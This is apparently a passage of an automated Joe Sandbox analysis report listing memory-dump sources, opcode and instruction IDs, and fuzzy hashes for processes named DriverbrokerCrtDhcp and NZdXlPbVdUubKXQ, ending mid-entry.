                                                                                      • Instruction ID: 6052fbad3f55d95a2c5c22cb43b496871d6015be0ca8953977cda05dc10d0543
                                                                                      • Opcode Fuzzy Hash: 16845b040a83f0669127dfe6eccf85388e00daa5f602290bad752e61dd247e3b
                                                                                      • Instruction Fuzzy Hash: A7115E35B0C6898FEB02EB7888A51D9BFB0EF82315F1945B6C194DB182EA3856598781
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6e47b1338d2ae7ec2fa182b51374b2beb99f0dfbda3857e94501ba880257b0b4
                                                                                      • Instruction ID: fea490eab609651cdf9611433b43653963509312144f3cb48c36783fed3cda13
                                                                                      • Opcode Fuzzy Hash: 6e47b1338d2ae7ec2fa182b51374b2beb99f0dfbda3857e94501ba880257b0b4
                                                                                      • Instruction Fuzzy Hash: 88011A11F18D1A5AFAD4F72884E93791AC1EF9B725F144876D60EE32C2DE2C6C41A281
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3c470eac8f8c12bd5645bebd4b9f12c48d4f52f755c9bcd8532cc1318e1ee608
                                                                                      • Instruction ID: 491a172a0bf661d65b90dfa47a53abaac9fb721dbb5f26f26601e5a58c4b40b5
                                                                                      • Opcode Fuzzy Hash: 3c470eac8f8c12bd5645bebd4b9f12c48d4f52f755c9bcd8532cc1318e1ee608
                                                                                      • Instruction Fuzzy Hash: C6F0C83170C9084FDBACAE2864562F973D5EF89321B14117FE54EC3652CE3568024245
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5f2dad47bfc686cb3e7175dabfff67ba7197d6fad9d3b968f237e02207bef699
                                                                                      • Instruction ID: 5c7f2a9f7a40eb2cee4ee096caaab1812ef31d5ed8c896d2be828ac87df609c8
                                                                                      • Opcode Fuzzy Hash: 5f2dad47bfc686cb3e7175dabfff67ba7197d6fad9d3b968f237e02207bef699
                                                                                      • Instruction Fuzzy Hash: 46018E35B0C6898FE702EB7888A11DD7FB0EF42310F1545B6C184CB183DA3856498741
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9b2323c4fc58ec409d7d825592ce8d2d774475a6cbe3d4345e9ea741ac018394
                                                                                      • Instruction ID: 9eef05560079e0bf079428dc6a331e916eb72da663b3833277b07dd45730950d
                                                                                      • Opcode Fuzzy Hash: 9b2323c4fc58ec409d7d825592ce8d2d774475a6cbe3d4345e9ea741ac018394
                                                                                      • Instruction Fuzzy Hash: F4019335B1F90ADAEBE8DB6484B25BD7261FF46301F501077D61EC25C1DE2DFA10A682
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bfdcbe9f3e206829674fb8ad086918a90ac9ad94690e3ed3ee49aa37fb80c2f7
                                                                                      • Instruction ID: a5fcc76f0bc39e0b5713b9e38d6c7c0d3a1e8ede5e51b1e33cfb84018de2a8ad
                                                                                      • Opcode Fuzzy Hash: bfdcbe9f3e206829674fb8ad086918a90ac9ad94690e3ed3ee49aa37fb80c2f7
                                                                                      • Instruction Fuzzy Hash: E60128322091468FD71A9B68D8A26E577A0EF03320F1846BEE909CB6C2CA6DA554C791
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 362013b5d34738acc780285e36e4ae4212c5fcccef5f2157d53fb0f7eac37152
                                                                                      • Instruction ID: 88d34e36ccd910e7c9a613af4694b15b81f9def327dd4448e16916fd34ba08f1
                                                                                      • Opcode Fuzzy Hash: 362013b5d34738acc780285e36e4ae4212c5fcccef5f2157d53fb0f7eac37152
                                                                                      • Instruction Fuzzy Hash: 63017131A1CD098FDB54EB08C4E4EAE7BA1FF99300F104129C00AE32A0DB38A845DBC1
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4499210288fa85df441ce735375f38dccceafb3448e3dc280f0abd037ff5f80b
                                                                                      • Instruction ID: fc6d781b28e3908a27344c3e8f6931c8feff730e2eabc6c8388ef7345dcf9978
                                                                                      • Opcode Fuzzy Hash: 4499210288fa85df441ce735375f38dccceafb3448e3dc280f0abd037ff5f80b
                                                                                      • Instruction Fuzzy Hash: 0FF0BE32F08E2C4FD7A8D68884683ED32E1EB89311F00027BDA0DE3285CE686C465781
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f8bd481db6d5591972f59801fcc9b2e3b2a303e7f5574e4216267c05e0dc18fc
                                                                                      • Instruction ID: 967bfd557a61ff0b466faf6bd0b5b5d87f5ff1e5e99879c141c93ff42a9ee681
                                                                                      • Opcode Fuzzy Hash: f8bd481db6d5591972f59801fcc9b2e3b2a303e7f5574e4216267c05e0dc18fc
                                                                                      • Instruction Fuzzy Hash: A2018C30A0D6899FEB02EB7888A419D7FB0AF43314F1841E6C184CB293EA385A499781
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 847e2acd250c42c5d362564e3d6d1d04fb0f5c6835cad98176dba357adfc8ced
                                                                                      • Instruction ID: 0c143bd687280fc07db31e777880ff5eeee83d7b009376b61ad922fc0056093a
                                                                                      • Opcode Fuzzy Hash: 847e2acd250c42c5d362564e3d6d1d04fb0f5c6835cad98176dba357adfc8ced
                                                                                      • Instruction Fuzzy Hash: 60F0963254D2C59FD3068BB098614D63FB4AF43214B5801FAE149C70B2C92D1646D761
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 37f4647dc21c0fbad07808d1cd4446439da6f65362a7351ede88587baaffe154
                                                                                      • Instruction ID: ac77ff1bb8a0ee16bab4a0297563d058a8eaf6c6654a231d0a5c8c4437b296e3
                                                                                      • Opcode Fuzzy Hash: 37f4647dc21c0fbad07808d1cd4446439da6f65362a7351ede88587baaffe154
                                                                                      • Instruction Fuzzy Hash: 49F0C23144E3C59FD712DBB088B15ED7FA4EF43200B1840E7D545C60A2C52C564AD761
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 87ef4ce0fc25608a156b9f2474479eb0a4d6248c83802b823d5b44f0d81c9d83
                                                                                      • Instruction ID: bd73dad9c1a9371ec72fc57e7984922591088a2b31c78917244820c73c830640
                                                                                      • Opcode Fuzzy Hash: 87ef4ce0fc25608a156b9f2474479eb0a4d6248c83802b823d5b44f0d81c9d83
                                                                                      • Instruction Fuzzy Hash: 36F0903195E2C69FD3028BB09C659EE3FB4AF43204F1400F6E585CB0A2DA2D664BD761
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 20556f1c04098fc7360c0228a5282e9f9ddf5ec4a835f03699871c57df4dcf67
                                                                                      • Instruction ID: 83bb0b3519148f23846aad9b1d380005ed85e68ccd0eefb0a1be929b404e9c33
                                                                                      • Opcode Fuzzy Hash: 20556f1c04098fc7360c0228a5282e9f9ddf5ec4a835f03699871c57df4dcf67
                                                                                      • Instruction Fuzzy Hash: 3B014F30E0D6899FEB02DBB889A41DD7FB0AF47314F1841E6D545DB293E9385A44D781
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 58ce5e3b36f8b92d73054b4300b72ff7e089c5c5806085e2c82c48487dc9cc17
                                                                                      • Instruction ID: 8ed8776edd5a2fd5b0395d8e4b0808c47b09243f1e6750e6f06107b8191bf94e
                                                                                      • Opcode Fuzzy Hash: 58ce5e3b36f8b92d73054b4300b72ff7e089c5c5806085e2c82c48487dc9cc17
                                                                                      • Instruction Fuzzy Hash: AAE02625A4C84A07E77CB6B468725B17281EB86214B0511BAD01AC36C2CD1D5C818380
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c49a988c7ec7c94248d4ebf7f706ed808917dc94afe421db2490de3013c6eda9
                                                                                      • Instruction ID: 872709db6080efad60e3dca7f1b71c53798897d949d6a17bb59296eef2980277
                                                                                      • Opcode Fuzzy Hash: c49a988c7ec7c94248d4ebf7f706ed808917dc94afe421db2490de3013c6eda9
                                                                                      • Instruction Fuzzy Hash: 85E0C932E2C40F8FDB95DBD4D4A15FEB770FF4A340F540239C20EE2181DA292500A654
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4d66710d8976b09c8fb163e7f8772538678294ef6a469687554354ea1649e1db
                                                                                      • Instruction ID: 112b69e81fa5bc162e045baab2a5e282556715e63bda527b68e2d140aed916c0
                                                                                      • Opcode Fuzzy Hash: 4d66710d8976b09c8fb163e7f8772538678294ef6a469687554354ea1649e1db
                                                                                      • Instruction Fuzzy Hash: EBE01221E0D81686FB94A794D8A1BA86661EF45310F1041B4DA4ED33C1CD3CAE44D749
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d2c39c4ae3d8ed7aa12466422c24132735aa450ae74f4277d99848f9feb667b7
                                                                                      • Instruction ID: 20bdd2c432efa9fc6e7695324eb4bb21a4fe6da2953b886b444bacc5a79bd42e
                                                                                      • Opcode Fuzzy Hash: d2c39c4ae3d8ed7aa12466422c24132735aa450ae74f4277d99848f9feb667b7
                                                                                      • Instruction Fuzzy Hash: 00E01282F0D7824BE756073508F11BC2FA1AF1B341B5905F7C65ACA2D3DA5C3909B725
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a0b414912a7686c33b155c26ab2936b8783952109ef680d42535e2115ecf4cc2
                                                                                      • Instruction ID: 6a84f2c8b9e765e391db5c0463a70c77fa1d4daa4fd79fb9a9ffda5b52a31376
                                                                                      • Opcode Fuzzy Hash: a0b414912a7686c33b155c26ab2936b8783952109ef680d42535e2115ecf4cc2
                                                                                      • Instruction Fuzzy Hash: E0C08C00F0EC0601A42433AD14E60BCA940BFC7220FE00032C30CC40C0AC0F20852182
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e1d6a0e4d0c48c69e875b61988110369462ee0ba766568c10475daae8059959c
                                                                                      • Instruction ID: 93241b530e2f3752f45b1d5a72e20231946c2c53edae25d775303360bdc3e135
                                                                                      • Opcode Fuzzy Hash: e1d6a0e4d0c48c69e875b61988110369462ee0ba766568c10475daae8059959c
                                                                                      • Instruction Fuzzy Hash: 96C04C305218099FC984F739D9859547BE0FB4A205BD510D0E509C7161E65A98559745
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f1c9f1b42b66519728e8d3793e8d066ba13f0119d55f278057a56a3125bde40f
                                                                                      • Instruction ID: 62659749915761772f58657fe4d31495ab6eee76529e8ad7035c8466df901d40
                                                                                      • Opcode Fuzzy Hash: f1c9f1b42b66519728e8d3793e8d066ba13f0119d55f278057a56a3125bde40f
                                                                                      • Instruction Fuzzy Hash: 11D09212B1E6178BF668560142F023E22916F07301E2C023AC39FC19C1CD6CB5417202
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 88aee399057a8ae294d7c21b75ba5aea158a791c35857b1981143dab32966a3c
                                                                                      • Instruction ID: b938ffa34366434b1cba19927a6fd083dc7b7a07399069018ae3720a5b42b36b
                                                                                      • Opcode Fuzzy Hash: 88aee399057a8ae294d7c21b75ba5aea158a791c35857b1981143dab32966a3c
                                                                                      • Instruction Fuzzy Hash: 1DD09216B0CA0387F1694A4141F023913909F43B00EA84A3ECB5FC98C18B1D78257221
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b05c5bb53e9d748e1caaf51cdae38a4dfdc0f414fa437870993a9e9309608a88
                                                                                      • Instruction ID: b0462a2304dc469655d61a4902a60c4e11a3e2d187de913db28aa6aa68856456
                                                                                      • Opcode Fuzzy Hash: b05c5bb53e9d748e1caaf51cdae38a4dfdc0f414fa437870993a9e9309608a88
                                                                                      • Instruction Fuzzy Hash: 54D0CA21B0CA0786F27E8A0380F423E61A18F03341EE080BFC29FC18D6CD1CB942720A
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6f4638bde2b61fcefbbb0c6687629a8e9d07f94e331dabadf6f31afb86bdf19e
                                                                                      • Instruction ID: 275f1463f9094cb814250b3f5b440140c1696458beae6dfcccc5ff2cf93cbd12
                                                                                      • Opcode Fuzzy Hash: 6f4638bde2b61fcefbbb0c6687629a8e9d07f94e331dabadf6f31afb86bdf19e
                                                                                      • Instruction Fuzzy Hash: 2DD09220B0E54B85F968461340B023E55A0AF03301E6044BBC29FC18D2CD2C75657221
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1dc30a3aef34f05eb9ab3054ed56875d62711f7ec788685c9f91cf3f297b139b
                                                                                      • Instruction ID: 3b7229eb1906a206c89c427c4efb9d12619beb0cd0d7d2dc576cf86d2c78e6f2
                                                                                      • Opcode Fuzzy Hash: 1dc30a3aef34f05eb9ab3054ed56875d62711f7ec788685c9f91cf3f297b139b
                                                                                      • Instruction Fuzzy Hash: F9C04C45F1881A17F255735451352BD08466F84714F645434E40FD72C6CE6C690652C6
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 14794c1dd9c71b4b61fb2a7fc9270535766c48d62ded38e7f805824f8f65ff39
                                                                                      • Instruction ID: 9ee66a9d0973c6c8dae4be9131789f5278ef7f3ed312a1be9d1a0f56adaaf172
                                                                                      • Opcode Fuzzy Hash: 14794c1dd9c71b4b61fb2a7fc9270535766c48d62ded38e7f805824f8f65ff39
                                                                                      • Instruction Fuzzy Hash: CDC08C20B0D2438FF315531482B133A3760AF03300F2842BAC60ECA4D2CD2CBA41B311
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ae9a4a536361b5a2fe42bf7321f4aa918b01c2226b1d561560d20af387c2d1da
                                                                                      • Instruction ID: ff21f108bced2b03b4263d727cebc68d9eae8252bb4b3f3593d0cfce550cf207
                                                                                      • Opcode Fuzzy Hash: ae9a4a536361b5a2fe42bf7321f4aa918b01c2226b1d561560d20af387c2d1da
                                                                                      • Instruction Fuzzy Hash: D4C04C40F0E3835BEB61527608F507D5B611F1B305B9906F3D286D51C7E84C6855A365
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9517ad6f383d14280c7ddbd16538a4088edfbfc00dd3f0819667ae87231be9d0
                                                                                      • Instruction ID: 3574b61943c4ac72588a7689d2704eb377fc5b7a795855d783841b523c6b1e1e
                                                                                      • Opcode Fuzzy Hash: 9517ad6f383d14280c7ddbd16538a4088edfbfc00dd3f0819667ae87231be9d0
                                                                                      • Instruction Fuzzy Hash: 6CB00204D5AC0A01A55873B919D647478507BC7115FD51170D50DD41C5EC4E15952252
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 586735d4663d2c719c323930513a00f0b30e4d5a6ef8b80366d5c732b0ff249d
                                                                                      • Instruction ID: 809c713575c486cbe22e3ba3ff7f781e943426e19e05911bb2f44a56a5e8327e
                                                                                      • Opcode Fuzzy Hash: 586735d4663d2c719c323930513a00f0b30e4d5a6ef8b80366d5c732b0ff249d
                                                                                      • Instruction Fuzzy Hash: 2DA00106F1C74397EA2480A50DE403EA2C10F4A645A6C4B75D70BC52C6E89C39407161
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2989550297.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffd348d3000_NZdXlPbVdUubKXQ.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0a51eede46f4410cf6c29f2d31de2ebb0d1e72903540b3f19a205714e6846f33
                                                                                      • Instruction ID: e82543665e438abb5bc803f58ec59698558cb8c8dedc57546a0af8cdbe4c2a20
                                                                                      • Opcode Fuzzy Hash: 0a51eede46f4410cf6c29f2d31de2ebb0d1e72903540b3f19a205714e6846f33
                                                                                      • Instruction Fuzzy Hash: 5FC17825A6F69A0BE31D4A284CE24B57791EF93209B2943BDCBDBC3087DD1C6407A6C5
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2989550297.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffd348b0000_NZdXlPbVdUubKXQ.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6e90e1195804b49d8a52d0fc15c39173cbee980a9068d97233dbdee39e48f884
                                                                                      • Instruction ID: 56001776b216e5f8e1fee07b5c7687d354ecda4c6ecc0cd502bb26e7c5d2ca2f
                                                                                      • Opcode Fuzzy Hash: 6e90e1195804b49d8a52d0fc15c39173cbee980a9068d97233dbdee39e48f884
                                                                                      • Instruction Fuzzy Hash: F591C171A08A898FE795DB98D8B93F9BBE1FF55301F44027ED109D72A2DFB924058780
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2989550297.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffd348d3000_NZdXlPbVdUubKXQ.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: M
                                                                                      • API String ID: 0-3664761504
                                                                                      • Opcode ID: 56d1bd4b241726eaa20496d5937634f91f472df660cd7af82250ebe18bdfb6a0
                                                                                      • Instruction ID: c5ec0ff1e897eafda451f29e3f5919fa0b5298cae14809cb7e80eebb0bfb4a38
                                                                                      • Opcode Fuzzy Hash: 56d1bd4b241726eaa20496d5937634f91f472df660cd7af82250ebe18bdfb6a0
                                                                                      • Instruction Fuzzy Hash: 3C119461E0D7894FEB559B7448A50E9BFE0EF97310B4901FBC549CB1A2EE2C9886C701
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2989550297.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffd348d3000_NZdXlPbVdUubKXQ.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: M
                                                                                      • API String ID: 0-3664761504
                                                                                      • Opcode ID: cee04dd55ac43ea9fa4c2531a144f1b55e4a68ea3680d02dd4e8f43631f373a4
                                                                                      • Instruction ID: 66ca4f8a50e83023bc80df1c7e2ef3970818648e855aecb8f13382df1890102b
                                                                                      • Opcode Fuzzy Hash: cee04dd55ac43ea9fa4c2531a144f1b55e4a68ea3680d02dd4e8f43631f373a4
                                                                                      • Instruction Fuzzy Hash: 76F0657190F3C04FCB16A7344869455BFA1EF6721174A51EEC046CF5A3DA1D8845C711
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001F.00000002.2989550297.00007FFD348D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D3000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_31_2_7ffd348d3000_NZdXlPbVdUubKXQ.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: I
                                                                                      • API String ID: 0-3707901625
                                                                                      • Opcode ID: 83fa33732fddb0de3e6f35b6d3b106f1aa29a0488885119809d88636b20edf0a
                                                                                      • Instruction ID: 58eedb3a0d00a7e708315af988068092780dabca84251c9caac9f1ae678b9ca6
